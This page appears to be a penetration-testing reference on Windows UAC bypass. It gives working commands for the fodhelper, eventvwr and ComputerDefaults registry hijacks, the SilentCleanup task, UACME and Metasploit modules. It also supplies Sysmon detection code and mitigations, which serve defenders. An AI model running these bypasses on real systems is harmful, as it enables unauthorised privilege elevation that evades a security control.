UAC Bypass

Overview

User Account Control (UAC) prompts for consent when a process requires elevated privileges. Even local administrators run in a split-token model — a medium integrity token for normal operations and a high integrity token when elevation is approved. UAC bypass techniques allow a local admin to elevate to high integrity without triggering the UAC prompt. This is not a privilege escalation from standard user to admin — it is an integrity level elevation for users who are already local administrators.

ATT&CK Mapping

  • Tactic: TA0004 - Privilege Escalation
  • Technique: T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control

Prerequisites

  • Shell access as a user who is a member of the local Administrators group
  • Running at medium integrity (standard UAC-restricted context)
  • UAC not set to "Always Notify" (highest setting blocks most bypasses)

Techniques

Identifying Integrity Level

:: Check current integrity level
whoami /groups | findstr /i "label"

:: Levels:
:: Mandatory Label\Medium Mandatory Level  — UAC-restricted (need bypass)
:: Mandatory Label\High Mandatory Level    — Elevated (already admin)
:: Mandatory Label\System Mandatory Level  — SYSTEM

Identifying UAC Configuration

:: Check UAC settings
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop

:: EnableLUA = 0 → UAC disabled (no bypass needed)
:: ConsentPromptBehaviorAdmin:
::   0 = Elevate without prompting
::   1 = Prompt for credentials on secure desktop
::   2 = Prompt for consent on secure desktop
::   3 = Prompt for credentials
::   4 = Prompt for consent
::   5 = Prompt for consent for non-Windows binaries (DEFAULT)

Fodhelper.exe Bypass

fodhelper.exe is an auto-elevating Microsoft binary (it runs elevated without a UAC prompt). When launched it reads a registry key under HKCU, which the medium-integrity user can write, and executes the handler it finds there:

:: Set the registry key to execute our payload
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f

:: Trigger fodhelper — it reads the registry key and executes our command as high integrity
fodhelper.exe

:: Clean up
reg delete HKCU\Software\Classes\ms-settings /f

Eventvwr.exe Bypass

eventvwr.exe auto-elevates and queries HKCU\Software\Classes\mscfile\shell\open\command before falling back to the default handler:

:: Set registry key
reg add HKCU\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f

:: Trigger
eventvwr.exe

:: Clean up
reg delete HKCU\Software\Classes\mscfile /f

Note: This bypass was patched in Windows 10 Creators Update (build 15063, April 2017). It works on Windows 7, 8, 8.1, and Windows 10 pre-Creators Update.

ComputerDefaults.exe Bypass

:: Set registry key
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f

:: Trigger
ComputerDefaults.exe

:: Clean up
reg delete HKCU\Software\Classes\ms-settings /f

Disk Cleanup Bypass

Disk Cleanup (cleanmgr.exe) auto-elevates and loads DLLs from a predictable location:

:: The elevated cleanmgr process loads DLLs from:
:: C:\Users\<user>\AppData\Local\Temp\<GUID>\
:: If you can predict or control this, DLL hijacking is possible

:: Alternative: use the scheduled task method
:: Disk Cleanup has a scheduled task that runs elevated
schtasks /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup"

UACME Framework

UACME is a collection of UAC bypass techniques compiled into a single tool:

:: UACME
:: https://github.com/hfiref0x/UACME
:: Specify bypass method number and payload
Akagi64.exe <method_number> C:\Users\Public\payload.exe

UACME documents 60+ bypass methods. Check the repository for which methods work on specific Windows versions.

Metasploit UAC Bypass

# From a Meterpreter session at medium integrity
# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# Show the current user, then try the built-in elevation (getsystem normally fails from a medium-integrity token)
getuid
getsystem

# If getsystem fails, use UAC bypass modules
background
use exploit/windows/local/bypassuac_fodhelper
set SESSION <session_id>
set LHOST <attacker>
run

# Other UAC bypass modules
use exploit/windows/local/bypassuac_eventvwr
use exploit/windows/local/bypassuac_comhijack

Detection Methods

Network-Based Detection

  • Not directly observable on the network

Host-Based Detection

  • Monitor registry modifications to HKCU\Software\Classes\ms-settings\ and HKCU\Software\Classes\mscfile\
  • Alert on auto-elevating binaries (fodhelper.exe, eventvwr.exe) spawning unexpected child processes
  • Sysmon Event ID 13 — registry value changes in UAC-related keys
  • Process creation events (Event ID 4688) showing high-integrity processes spawned from medium-integrity parents via auto-elevating binaries
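The two host-based signals above (Sysmon Event ID 13 on the hijacked Classes keys, and an auto-elevating binary spawning a high-integrity child) as one detection routine run over constructed Sysmon-style events. This is an added example, not code from the original page; the field names follow Sysmon's ProcessCreate and RegistryEvent schemas, and the SIDs and paths in the sample events are made up.

```python
import re
from typing import Optional

# Auto-elevating binaries named on this page. A high-integrity child of one
# of them, created from a medium-integrity session, is the alert condition.
AUTO_ELEVATORS = {"fodhelper.exe", "eventvwr.exe", "computerdefaults.exe"}

# Registry paths the fodhelper/ComputerDefaults and eventvwr bypasses write.
# Sysmon records HKCU keys as HKU\<SID>\..., so match on the Classes suffix.
HIJACK_KEY_RE = re.compile(
    r"\\Software\\Classes\\(ms-settings|mscfile)\\Shell\\Open\\command\\",
    re.IGNORECASE,
)

def detect(event: dict) -> Optional[str]:
    """Return an alert string for one Sysmon event (flattened to a dict), else None."""
    eid = event.get("EventID")
    if eid == 13:  # RegistryEvent (Value Set)
        target = event.get("TargetObject", "")
        if HIJACK_KEY_RE.search(target):
            return f"registry hijack for UAC bypass: {target} = {event.get('Details', '')!r}"
    elif eid == 1:  # ProcessCreate carries IntegrityLevel and ParentImage
        parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        if parent in AUTO_ELEVATORS and event.get("IntegrityLevel") == "High":
            return f"{parent} spawned high-integrity child {event.get('Image', '')}"
    return None

def scan(events) -> list:
    """Run detect() over a sequence of events and collect the alerts."""
    return [alert for alert in map(detect, events) if alert]

# Constructed sample events (not real telemetry): the three bypass artefacts
# plus two benign events that must not fire.
SID = r"HKU\S-1-5-21-1111-2222-3333-1001"
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": SID + r"\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute", "Details": ""},
    {"EventID": 13, "TargetObject": SID + r"\Software\Classes\mscfile\shell\open\command\(Default)", "Details": "cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\fodhelper.exe", "IntegrityLevel": "High"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
    {"EventID": 13, "TargetObject": SID + r"\Software\Classes\.txt\(Default)", "Details": "txtfile"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The same two conditions map onto Security Event ID 4688 (Creator Process Name plus Mandatory Label) and native registry auditing if Sysmon is not deployed.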

Mitigation Strategies

  • Set UAC to "Always Notify" — blocks most auto-elevation bypasses (ConsentPromptBehaviorAdmin = 2)
  • Use standard user accounts — UAC bypass only works for local administrators; standard users are not affected
  • Enable Credential Guard — protects against some token-based bypasses
  • Monitor registry changes — alert on modifications to auto-elevation registry paths
  • Application control — restrict execution of unexpected binaries
